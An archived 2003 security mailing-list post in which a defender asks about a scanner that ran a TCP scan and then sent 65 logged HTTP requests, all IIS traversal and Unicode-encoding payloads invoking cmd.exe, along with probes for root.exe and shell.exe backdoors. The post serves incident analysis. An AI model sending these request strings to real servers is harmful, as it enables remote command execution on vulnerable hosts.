('binary' encoding is not supported, stored as-is) Hello, Does anyone recognize this pattern of a TCP connect scan, then 65 GETs? Note that it also included: "User-Agent:.Mozilla/3.0. (compatible;.Indy.Library)...." For which my googling tells me that this attack/scanner is probably built using Borland Delphi/C++ Builder suite. I've so far received 3 of these from 2 different IP addresses. The first two were from a Comcast cable user. The last was from a Cox Communications IP. Thanks, Mark Embrich 0. Scan TCP 80 1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 3. GET./_vti_bin/.%252e/.%252e/.%252e/.% 252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%% 35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 8. GET./_vti_bin/..%255c..%255c..%255c..%255c..% 255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..% 252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 21. GET./msadc/.%252e/.%252e/.%252e/.% 252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 23. GET./msadc/..%%35%63../..%%35%63../..%%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 24. GET./MSADC/..%%35c..%%35c..%%35c..%% 35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 25. GET./msadc/..%%35c../..%%35c../..%% 35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 28. GET./msadc/..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 29. GET./msadc/..%255c../..%255c../..% 255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 30. GET./msadc/..%c0%af../..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 31. GET./msadc/..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/% af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1.. 33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1.. 34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1.. 35. GET./PBServer/..%%35%63..%%35%63..%%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 36. GET./PBServer/..%%35c..%%35c..%% 35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 37. GET./PBServer/..%25%35%63..%25%35%63..%25%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 38. GET./PBServer/..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 39. GET./Rpc/..%%35%63..%%35%63..%%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 40. GET./Rpc/..%%35c..%%35c..%% 35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 41. GET./Rpc/..%25%35%63..%25%35%63..%25%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 42. GET./Rpc/..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 43. GET./samples/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 46. GET./scripts/.%252e/.% 252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 47. GET./scripts/..%252f..%252f..%252f..% 252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 48. GET./scripts/..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0% AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1% 1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1% 9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 60. GET./scripts/..%e0%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 61. GET./scripts/..%f0%80%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 62. GET./scripts/..%f8%80%80%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 63. GET./scripts/..%fc%80%80%80%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1.. 65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1.. ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 25 2003 - 11:43:04 PDT